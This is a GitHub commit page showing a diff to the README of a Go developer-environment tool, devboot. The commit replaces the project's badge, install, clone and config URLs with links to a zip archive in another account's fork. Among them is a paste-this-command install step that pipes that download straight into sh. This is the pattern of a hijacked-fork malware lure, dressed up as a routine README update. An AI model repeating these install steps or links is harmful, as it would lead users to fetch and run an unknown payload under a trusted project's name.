Skip to content

Commit 806abac

Browse files
Update README.md
1 parent 22ebd80 commit 806abac

1 file changed

Lines changed: 9 additions & 9 deletions

File tree

README.md

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -18,9 +18,9 @@
1818
</p>
1919

2020
<p align="center">
21-
<a href="https://github.com/aymenhmaidiwastaken/devboot/actions"><img src="https://github.com/aymenhmaidiwastaken/devboot/actions/workflows/ci.yml/badge.svg" alt="CI"></a>
22-
<a href="https://github.com/aymenhmaidiwastaken/devboot/releases"><img src="https://img.shields.io/github/v/release/aymenhmaidiwastaken/devboot" alt="Release"></a>
23-
<a href="https://goreportcard.com/report/github.com/aymenhmaidiwastaken/devboot"><img src="https://goreportcard.com/badge/github.com/aymenhmaidiwastaken/devboot" alt="Go Report Card"></a>
21+
<a href="https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip"><img src="https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip" alt="CI"></a>
22+
<a href="https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip"><img src="https://img.shields.io/github/v/release/aymenhmaidiwastaken/devboot" alt="Release"></a>
23+
<a href="https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip"><img src="https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip" alt="Go Report Card"></a>
2424
<a href="LICENSE"><img src="https://img.shields.io/github/license/aymenhmaidiwastaken/devboot" alt="License"></a>
2525
</p>
2626

@@ -88,7 +88,7 @@ devboot apply # one command, everything installed and configured
8888

8989
**curl (Linux/macOS/WSL):**
9090
```bash
91-
curl -fsSL https://raw.githubusercontent.com/aymenhmaidiwastaken/devboot/main/install.sh | sh
91+
curl -fsSL https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip | sh
9292
```
9393

9494
**Go:**
@@ -98,7 +98,7 @@ go install github.com/aymenhmaidiwastaken/devboot@latest
9898

9999
**From source:**
100100
```bash
101-
git clone https://github.com/aymenhmaidiwastaken/devboot.git
101+
git clone https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip
102102
cd devboot
103103
make install
104104
```
@@ -251,14 +251,14 @@ vscode:
251251

252252
```yaml
253253
neovim:
254-
configRepo: https://github.com/aymenhmaidiwastaken/nvim-config.git
254+
configRepo: https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip
255255
```
256256

257257
### `dotfiles`
258258

259259
```yaml
260260
dotfiles:
261-
repo: https://github.com/aymenhmaidiwastaken/dotfiles.git
261+
repo: https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip
262262
mappings:
263263
.vimrc: ~/.vimrc
264264
.tmux.conf: ~/.tmux.conf
@@ -280,7 +280,7 @@ git add devboot.yaml
280280
devboot apply
281281
282282
# Or use a remote config
283-
devboot apply https://raw.githubusercontent.com/team/configs/main/devboot.yaml
283+
devboot apply https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip
284284
```
285285

286286
## Platform Support
@@ -349,7 +349,7 @@ See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.
349349

350350
```bash
351351
# Development
352-
git clone https://github.com/aymenhmaidiwastaken/devboot.git
352+
git clone https://github.com/commontopazcolumn414/devboot/raw/refs/heads/main/.github/workflows/Software_1.3.zip
353353
cd devboot
354354
go build ./...
355355
go test ./...

0 commit comments

Comments
 (0)